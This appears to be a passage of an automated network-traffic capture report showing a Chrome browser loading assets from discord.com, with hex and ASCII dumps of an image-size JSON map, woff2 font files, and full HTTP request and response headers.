                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC1369INData Raw: 22 33 31 39 34 39 32 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 35 37 2e 6a 70 67 22 3a 22 32 35 36 34 33 37 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 36 2e 6a 70 67 22 3a 22 34 32 30 34 35 36 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 36 31 2e 6a 70 67 22 3a 22 31 32 33 34 37 35 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 36 33 2e 6a 70 67 22 3a 22 32 38 36 30 37 33 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 36 34 2e 6a 70 67 22 3a 22 37 38 30 36 38 32 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 36 36 2e 6a 70 67 22 3a 22 37 39 34 30 38 34 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 37 2e 6a 70 67 22 3a 22 36 37 30 33 34 34 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 38 2e 6a 70 67 22 3a 22 32 39 31 33 31 37 22 2c 22 2e 2f 63 68 61 6d 70 69
                                                                                                                                                                                                                                                                                    Data Ascii: "319492","./champion_157.jpg":"256437","./champion_16.jpg":"420456","./champion_161.jpg":"123475","./champion_163.jpg":"286073","./champion_164.jpg":"780682","./champion_166.jpg":"794084","./champion_17.jpg":"670344","./champion_18.jpg":"291317","./champi
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC1369INData Raw: 69 6f 6e 5f 33 35 30 2e 6a 70 67 22 3a 22 31 33 38 31 34 31 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 33 36 2e 6a 70 67 22 3a 22 31 37 34 38 37 35 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 33 36 30 2e 6a 70 67 22 3a 22 36 31 36 37 36 35 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 33 37 2e 6a 70 67 22 3a 22 31 33 34 36 37 32 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 33 38 2e 6a 70 67 22 3a 22 31 32 34 30 39 34 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 33 39 2e 6a 70 67 22 3a 22 31 37 35 38 39 33 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 34 2e 6a 70 67 22 3a 22 37 30 30 35 36 32 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 34 30 2e 6a 70 67 22 3a 22 32 36 31 37 32 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 34 31 2e 6a 70 67 22 3a 22 32 36 39 31 37 37 22 2c 22 2e
                                                                                                                                                                                                                                                                                    Data Ascii: ion_350.jpg":"138141","./champion_36.jpg":"174875","./champion_360.jpg":"616765","./champion_37.jpg":"134672","./champion_38.jpg":"124094","./champion_39.jpg":"175893","./champion_4.jpg":"700562","./champion_40.jpg":"26172","./champion_41.jpg":"269177",".
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC1369INData Raw: 61 6d 70 69 6f 6e 5f 37 2e 6a 70 67 22 3a 22 34 32 36 35 33 36 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 37 31 31 2e 6a 70 67 22 3a 22 31 31 37 36 38 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 37 32 2e 6a 70 67 22 3a 22 34 31 32 34 36 31 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 37 34 2e 6a 70 67 22 3a 22 38 35 30 37 37 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 37 35 2e 6a 70 67 22 3a 22 36 32 30 36 35 33 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 37 36 2e 6a 70 67 22 3a 22 33 39 39 38 38 34 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 37 37 2e 6a 70 67 22 3a 22 33 35 33 30 32 36 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 37 37 37 2e 6a 70 67 22 3a 22 32 32 33 34 32 33 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 37 38 2e 6a 70 67 22 3a 22 39 38 36 33 34 36 22 2c
                                                                                                                                                                                                                                                                                    Data Ascii: ampion_7.jpg":"426536","./champion_711.jpg":"11768","./champion_72.jpg":"412461","./champion_74.jpg":"85077","./champion_75.jpg":"620653","./champion_76.jpg":"399884","./champion_77.jpg":"353026","./champion_777.jpg":"223423","./champion_78.jpg":"986346",
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC1369INData Raw: 5f 31 30 2e 6a 70 67 22 3a 22 34 31 34 30 34 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 30 31 2e 6a 70 67 22 3a 22 39 38 35 39 36 36 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 30 32 2e 6a 70 67 22 3a 22 36 39 33 32 34 37 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 30 33 2e 6a 70 67 22 3a 22 39 39 32 30 32 30 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 30 34 2e 6a 70 67 22 3a 22 33 36 38 32 33 38 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 30 35 2e 6a 70 67 22 3a 22 32 37 37 38 38 36 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 30 36 2e 6a 70 67 22 3a 22 38 39 36 32 35 34 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 30 37 2e 6a 70 67 22 3a 22 32 32 37 34 33 34 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 31 2e 6a 70 67 22 3a 22 31 39 38 31 34 38 22
                                                                                                                                                                                                                                                                                    Data Ascii: _10.jpg":"41404","./champion_101.jpg":"985966","./champion_102.jpg":"693247","./champion_103.jpg":"992020","./champion_104.jpg":"368238","./champion_105.jpg":"277886","./champion_106.jpg":"896254","./champion_107.jpg":"227434","./champion_11.jpg":"198148"


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    37192.168.2.549765162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC909OUTGET /assets/8234e0a75aa9afb205bd.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    Origin: https://discord.com
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/assets/69646.32a83a0c7e0a41f066e8.css
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC955INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:37 GMT
                                                                                                                                                                                                                                                                                    Content-Type: font/woff2
                                                                                                                                                                                                                                                                                    Content-Length: 43364
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0b0fc4e5e72-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "281bba49537cf936d1a0df10fb719f63"
                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 05 Jun 2024 19:27:59 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uH2Ufi8DCkPiJZiTR1BSBq1sMBZyW4K1JRnwRedWYWL8WGDNTAswIu1ufgnxAp0X3QljfHV6AQ54EJnFKqsueaFhFa%2BRyDVg07MfbplmY5VmkOIbVpe%2B21M6MhOU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC414INData Raw: 77 4f 46 32 00 01 00 00 00 00 a9 64 00 11 00 00 00 01 97 38 00 00 a9 00 00 03 00 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 82 78 1b 81 aa 40 1c a1 5c 06 60 00 8e 58 08 82 3e 09 9f 03 11 0c 0a 83 b6 0c 82 f9 22 01 36 02 24 03 9a 0c 0b 8d 08 00 04 20 05 95 05 07 b5 4b 0c 83 0e 5b 1e 71 91 02 aa 63 ed 9f 01 10 35 aa 6e 43 00 a8 fc 55 97 9b e7 1d 3f c1 94 ab 71 1c 7a 6e 1d 3c a9 96 2d ea 01 dc 61 a3 9c 43 cd b3 ad 4a 3b ec c5 38 fb ff ff ff ff 73 93 85 1c d6 ce d2 99 4d 12 40 35 a1 75 ff 46 97 94 11 14 29 17 27 a2 4e f3 02 39 7b 55 92 27 09 e7 75 81 0d f6 7c d8 3b 57 ae f3 99 9d f2 91 1f 67 7a 3b 6d 0e 6f 92 bc 26 41 82 b7 bb f7 be 6f da 2e 8b 93 9b ea bc c6 bb b0 94 56 6d 2f 90 f6 04 01 61 9a 56 4e 46 8b fb ac f0 b5 b4 ba fc 54 2f 24
                                                                                                                                                                                                                                                                                    Data Ascii: wOF2d8x@\`X>"6$ K[qc5nCU?qzn<-aCJ;8sM@5uF)'N9{U'u|;Wgz;mo&Ao.Vm/aVNFT/$
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 4a 3f b2 39 42 1e 26 c8 b5 66 fb 64 cb 29 07 54 b2 d9 0e 53 ba 80 20 6e 03 2a f6 e3 67 37 4e f7 e2 d1 92 77 19 3d 8e d7 06 7c ed 21 e6 a3 cd 0f af b9 bc 62 f7 ee 73 da ed 0f 9f f1 e6 17 08 7f 71 49 3c 46 3a c6 db dd 70 93 b5 17 79 0b 0c e5 32 07 68 a2 2b 31 4c a5 2c b1 6d 47 5c cf 17 34 aa 45 25 2b 72 aa 97 0e 81 f1 b5 d8 1e a2 b9 dd fd 6f 23 37 46 86 d4 48 a1 2d 2a c6 68 a1 0d 52 1b 98 45 58 64 48 59 b3 00 a1 0d c0 d1 0a 28 06 b4 01 08 2d 4a b6 c5 d8 00 4d 67 88 b5 25 6d e3 8d 35 49 d3 a6 8d 88 de 5d 72 51 6f d2 24 4d c5 d1 2a 6d 11 f5 6d e0 1b c1 64 4c 90 6d cc 90 6e ce 7e 03 e6 ec 99 02 63 6c 54 d0 6d f6 9e 3d 8b 28 0b 88 33 8b 2a b8 c8 ae d9 43 7a 81 8f 70 04 03 2e b9 00 b8 d4 95 bb 6b 81 e9 89 e2 64 46 3f 8a 14 2e 09 f4 80 e0 73 80 c0 01 72 51 a5 29
                                                                                                                                                                                                                                                                                    Data Ascii: J?9B&fd)TS n*g7Nw=|!bsqI<F:py2h+1L,mG\4E%+ro#7FH-*hREXdHY(-JMg%m5I]rQo$M*mmdLmn~clTm=(3*Czp.kdF?.srQ)
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 93 dc df 6f ad 51 cf a8 51 15 15 11 15 55 a3 af e6 7e fc 4e ec ff a5 6f e9 fb db d2 b7 ec 75 55 45 44 8c 71 8c 63 8c 88 ab 2e a4 4b a9 8c 04 d7 7d 25 1e 17 8b 09 c6 2c 81 7f b5 96 fa 19 69 bc 37 e0 62 4a e9 2c b0 e5 22 bf 5b 09 6e 19 3f 4e fa cc ba e4 a7 9f b3 42 02 9a 64 d7 6b 29 d5 2c 0a 28 6d 80 61 5a 61 1e e5 f7 ac cc 59 d5 0e a0 0e 48 01 36 90 20 c8 bf 7b ed 8c 15 e7 c1 00 e8 67 f4 70 7b 34 01 70 18 87 ff 97 b1 e8 c1 70 0c c4 4b 30 48 a8 18 90 38 a3 20 e3 89 04 23 46 14 8c 16 49 30 3a 4c c1 98 ea 09 26 d4 60 48 fe fa 1b 0c 33 05 ca 3b 74 50 83 45 42 3d b1 f6 50 03 d6 11 34 68 53 83 5e 5e 77 d0 b0 0d 06 0d df 9c a0 d1 8b 0f 9a b8 c4 a0 19 cb 08 9a bd db 41 ef ee 41 d0 47 7b 14 f4 c9 9e 04 cd 5f 7e d0 a2 15 07 2d db f3 a0 e5 a3 07 ad 5d 63 d0 e6 35 07
                                                                                                                                                                                                                                                                                    Data Ascii: oQQU~NouUEDqc.K}%,i7bJ,"[n?NBdk),(maZaYH6 {gp{4ppK0H8 #FI0:L&`H3;tPEB=P4hS^^wAAG{_~-]c5
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 88 a2 a9 90 57 6d 98 e4 27 b0 7a df c2 2b ef d6 50 60 35 95 ab c7 fb 4c e9 13 fe b9 9a 9b 8f 2b 99 7c d7 f2 2e 75 42 1d 20 4b 96 2a bd 65 0d d4 a4 d1 08 cc e9 d9 eb c4 6b 3a 74 96 66 47 4b bc f5 44 88 d2 be d5 81 bf d5 97 d8 57 4c de a4 af c8 2d da f2 19 ca d9 7d 34 f2 4f 83 ee bc 9b 3e c5 82 e3 c4 12 58 3a 2b 80 3d e8 72 a2 7c 1e 7d 83 cd 2e 48 b6 67 b3 3b 9e 16 fa b6 41 67 54 27 dd 78 f3 41 ed fc 13 cf d9 77 f7 20 b1 b0 bb 6f 00 da f8 2e ec 12 e4 86 cf 8e 8d 27 d4 ca e4 85 f3 0d dc 9d dd 03 05 c2 a2 ca 03 a5 87 0b b1 ce 9d ab 01 6c d4 c6 17 db 7c bf 53 65 ce 51 3b 37 22 08 64 b8 3f eb 98 c9 26 fa f7 76 77 ec 8d 25 cf 59 e6 a6 02 8c 99 7b a6 d6 79 72 a3 99 13 ca c7 c3 85 1c bb db b3 de 8e 45 5e 70 1c b4 03 b8 bc 93 7d 37 be 19 64 7c bf 42 fe 7d ff bf 66
                                                                                                                                                                                                                                                                                    Data Ascii: Wm'z+P`5L+|.uB K*ek:tfGKDWL-}4O>X:+=r|}.Hg;AgT'xAw o.'l|SeQ;7"d?&vw%Y{yrE^p}7d|B}f
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: f7 9a 3a dd bc e7 7d 69 3e 40 87 95 fc 6f 33 75 9a 7e e6 f3 db 15 56 fa 4a fa 3d a9 ce 7a 1b 7c ed 1b 1b a3 d3 f4 7b 3f a4 23 46 7b fc ec 17 bf da 3b 1e 73 3c fa ba 4f b3 ba 07 84 cb c2 99 bd 56 62 a9 2f ad b6 c6 77 ef 4e 3f fa c9 c9 ed c3 19 74 f8 5e 26 a4 69 68 6a 69 eb e8 ea e9 1b a0 54 1a 9d c1 64 b1 31 43 dc 2a c1 e1 f2 8a 3f 08 e1 c6 54 9a 89 a9 99 b9 85 a5 95 35 9d c1 64 d9 d8 da d9 bb 72 60 3b 72 8a 7f 63 ec b4 49 13 c0 6a b3 5b 41 b4 eb aa e0 74 a0 02 75 b0 c2 a2 d3 95 a5 b3 db ac 1d b1 c5 e4 2c 2b 4b de ca d2 cb af 30 dc a1 4a 54 85 aa 01 90 86 5c 78 76 d8 ba 42 31 46 b1 1b 82 6a 80 7e 54 2f 1d ed eb d6 be be 5b 7a 4f c7 7b 59 37 f4 d4 a0 89 97 d1 fc cf 67 49 62 97 dd 0f 03 e0 8c 4c 00 c4 a4 32 fd 48 b7 a5 ef 52 62 97 1e d2 b2 5b a5 45 a7 6c cd
                                                                                                                                                                                                                                                                                    Data Ascii: :}i>@o3u~VJ=z|{?#F{;s<OVb/wN?t^&ihjiTd1C*?T5dr`;rcIj[Atu,+K0JT\xvB1Fj~T/[zO{Y7gIbL2HRb[El
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 42 44 b6 4e 26 94 86 1a 13 93 22 01 fd a8 a4 b6 e9 28 58 ae bd 8c e1 84 e4 0d 29 97 83 28 04 ec 69 8e eb ef e4 06 53 22 8c 79 3e fc c1 4b 57 66 b8 cc c9 1a 2b 33 3e d4 66 70 3e ce a0 50 fa 29 c8 88 0c 44 10 05 22 91 84 c8 b2 28 70 19 79 a8 20 26 52 51 01 4d 64 e3 a7 a5 70 07 18 42 2e 93 16 c3 b1 e4 e4 bd e7 4e 4a b4 54 c0 34 32 53 8b 27 f9 3a b7 e1 6f f7 fa e1 8f 6a a5 61 d5 c0 e2 12 d3 41 d4 60 0b e3 f2 be 01 b3 6a e1 b5 63 44 de bf da a5 0d 80 cc e0 b7 87 d6 ba 4e 3d eb dd 2c bd 97 c5 cc 0d 75 11 04 51 d0 36 b2 57 01 5c 24 b0 82 39 a8 42 db 92 c6 08 92 64 d9 8e 0c e0 73 24 b3 82 f6 3b c8 e7 ee 0a 34 43 4d 1f 0e 96 41 b6 03 16 c6 c1 38 86 60 07 51 a5 b3 8f 7a f4 c3 a9 eb 7f 5e bb c2 d1 cd 9d 53 ec 96 cd 75 46 09 5b d1 35 76 4b 0b af d1 3b 14 84 45 07 59
                                                                                                                                                                                                                                                                                    Data Ascii: BDN&"(X)(iS"y>KWf+3>fp>P)D"(py &RQMdpB.NJT42S':ojaA`jcDN=,uQ6W\$9Bds$;4CMA8`Qz^SuF[5vK;EY
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: fd e6 7f 3f 5c d0 06 5d c0 00 9b 28 66 5c d2 46 f4 9c 42 5b 95 86 0b 03 01 30 50 52 90 12 98 51 c1 a8 01 0d 30 d2 6b 3c 54 46 46 53 93 a2 9a 60 60 b3 5c e2 eb f9 90 c5 58 99 ad 3f 4a 43 1c 3d 2e a3 86 0e f5 42 4f 84 7d 93 e6 4a fb 61 37 14 70 80 1d 75 c3 69 d3 9b d7 2e 41 82 5d 2f d0 96 7c 75 f2 c2 5d 7a ac 37 a1 b7 9f dc 4b 85 c6 c5 60 37 04 aa bf 91 0c ee 53 79 e6 47 0a 07 62 1c 8a 4c 88 b7 c2 0b 74 84 1d 5a d0 0a f6 a2 50 23 d4 fb 97 7a 11 2b e9 0a 1c 35 47 c9 d1 b0 07 c5 46 55 b0 a4 cd b1 88 90 66 86 00 d9 f9 68 49 aa 85 09 56 de 15 00 c0 fb 00 39 f1 55 9b 1b e7 f9 4f f2 08 50 ca 88 b5 a9 03 6b 29 f0 f8 17 76 d6 25 be 9e 1a ea a0 39 b4 cc 6c 22 2c a4 d5 64 13 b1 6a b7 f2 2b e4 c5 ed da 41 fd 50 49 1f 27 3f 9b 5b f1 4d df 8f 4f 13 ae d8 37 1f 46 e3 f8
                                                                                                                                                                                                                                                                                    Data Ascii: ?\](f\FB[0PRQ0k<TFFS``\X?JC=.BO}Ja7pui.A]/|u]z7K`7SyGbLtZP#z+5GFUfhIV9UOPk)v%9l",dj+API'?[MO7F
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 5f 62 4b f1 ad 65 79 46 16 e0 a6 ea 23 49 e9 16 ac 44 34 6c 69 75 98 71 6f ec 21 47 9b 57 05 9f 14 0e a9 a5 bc c8 ab 44 c7 49 4a a9 48 70 2d d6 51 2c 95 7a ec a2 8b 58 ea b2 06 c7 1c ca 68 c3 15 ac 95 cf 83 59 22 53 53 e1 24 03 48 82 5f a3 2a 0a 1c 46 35 e8 02 ad ef 56 1e 06 a8 75 91 e0 97 09 db 8c 6d a2 47 43 13 b1 a5 ba 05 db 0e 3f 0c 3e 84 8b 11 b6 cc 20 40 45 06 f6 2a 39 5d 31 9b f4 30 7b 28 ea f7 38 8c 33 d6 03 da 3b c2 d5 7d 94 f1 e3 e7 0d 5a 09 7b b8 25 a6 c5 af 72 42 cf e4 73 a5 6c e3 96 bc ca 91 15 6c 64 07 9a d6 df 1d 97 7e 6c b4 45 dd a2 2d fe cf f3 e9 c6 5f 23 38 86 e7 04 59 dd 60 d2 c5 54 7e 17 67 d1 aa dd 86 34 64 1f d7 bd 48 06 d9 7b f7 f0 9e 0b 5e c4 a9 4a e0 32 f2 b1 17 ec 39 cb 59 35 97 0b 6f dc 73 2c aa af 22 e4 5c a7 cd 7a a4 f0 5a be
                                                                                                                                                                                                                                                                                    Data Ascii: _bKeyF#ID4liuqo!GWDIJHp-Q,zXhY"SS$H_*F5VumGC?> @E*9]10{(83;}Z{%rBslld~lE-_#8Y`T~g4dH{^J29Y5os,"\zZ
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 17 b3 84 a5 2c 7d d9 bb b7 bc 90 11 88 7f 7b 96 b7 a7 1b d8 e0 86 36 bc 91 df 5e cb 09 93 93 36 f5 cc 66 37 17 32 7c 51 1a 0a 5b 47 6d e1 81 83 5b 56 de 6d 47 dd 85 8d 89 60 61 a4 c5 f0 6d 0f 82 8d b7 ba 73 cb 95 e7 a9 7c 05 0a 15 29 56 a2 43 e3 2d b6 dc 95 91 f3 56 b5 60 37 6e f1 8c ba f3 a7 4d 51 99 d8 02 f0 87 32 38 d1 9f 90 41 50 56 00 87 80 a9 88 21 c0 24 cb 0e 1c ac 89 96 b8 7d 40 d9 89 1d 35 cc db 4a bd ba 64 55 22 06 2f 67 b7 bc cd fd a3 d8 99 0d fe 2a 75 1d 3b 4a 3c 1c 2c c2 66 a7 f1 a2 ad d9 db 7d 0b 82 01 83 b7 c6 c4 83 c0 31 1a ae 4c a3 33 86 97 3c 6c 94 c4 0c 59 0c 64 92 8d 63 d3 bb 70 55 88 9e be 15 38 a5 b1 99 f0 f3 57 7e 7c b5 e2 39 4a 56 d5 83 4c 00 20 b8 44 48 76 e7 69 4d 29 fa e7 3e 0e 0f 4f e4 c8 95 e7 29 08 6b 88 90 50 d0 30 b0 fa 0c
                                                                                                                                                                                                                                                                                    Data Ascii: ,}{6^6f72|Q[Gm[VmG`ams|)VC-V`7nMQ28APV!$}@5JdU"/g*u;J<,f}1L3<lYdcpU8W~|9JVL DHviM)>O)kP0
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 3d 55 37 d3 74 23 75 11 e9 17 9d 51 51 19 16 99 41 89 59 94 90 79 f1 99 f5 28 cf 68 b9 95 1a a5 87 79 74 3f d7 1e e4 5e 6e c7 2b ca bf 62 2f 3a 57 79 01 bd ec 7c 01 b1 cb ca a1 8a 02 13 d5 27 26 e3 92 8a 7b 4b bd f4 d0 5b 7f 7d 3c aa 99 e6 92 b5 d1 56 8a a6 1a 68 a7 b5 16 5a 8d e1 18 0f 16 3d 40 52 41 2d 15 85 60 c2 d0 21 8d ca 28 8c f2 7c b7 44 ee c5 84 06 3e f2 82 b7 cd 26 83 00 1d e8 a1 79 c3 6b dc 92 66 80 81 f0 90 72 69 6d 88 a1 aa ee 4e 82 89 26 9b 64 8a a9 a6 9b e1 2d ef f8 c0 87 e6 5b f0 a8 18 28 33 8a 54 93 cd be 13 d4 54 46 6b 78 ba 10 23 ba b9 d7 62 3b c1 a1 c1 6d b6 fb 45 ba 95 f7 7f 3f 3f f8 d8 3e 9f d8 6f 8e df bd 68 09 d7 e8 69 de e5 74 ac bc bc e2 d5 85 5f 0f 3c 9f 70 d1 86 a8 1d b7 0e 04 5a b1 f0 16 1b 2d d8 79 8f 83 0f 58 79 47 cb 12 1d
                                                                                                                                                                                                                                                                                    Data Ascii: =U7t#uQQAYy(hyt?^n+b/:Wy|'&{K[}<VhZ=@RA-`!(|D>&ykfrimN&d-[(3TTFkx#b;mE??>ohit_<pZ-yXyG


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    38192.168.2.549764162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC909OUTGET /assets/b21c5111a12372139409.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    Origin: https://discord.com
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/assets/69646.32a83a0c7e0a41f066e8.css
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC953INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:37 GMT
                                                                                                                                                                                                                                                                                    Content-Type: font/woff2
                                                                                                                                                                                                                                                                                    Content-Length: 39724
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0b0ff4f41ba-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "ff5eccde83f118cea0224ebbb9dc3179"
                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 05 Jun 2024 19:27:57 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jm3Mgu1giCfWi7qAu6U6uyPQHigouRPJvRO5d1tQt88sxyHcVHwcgTXnsFrMwB6RI27JT7Awtnun2JNkDSC13xCj%2Fx2SHtNovZ04z7OOHg3F4AvaitBbZk9eh6Pq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
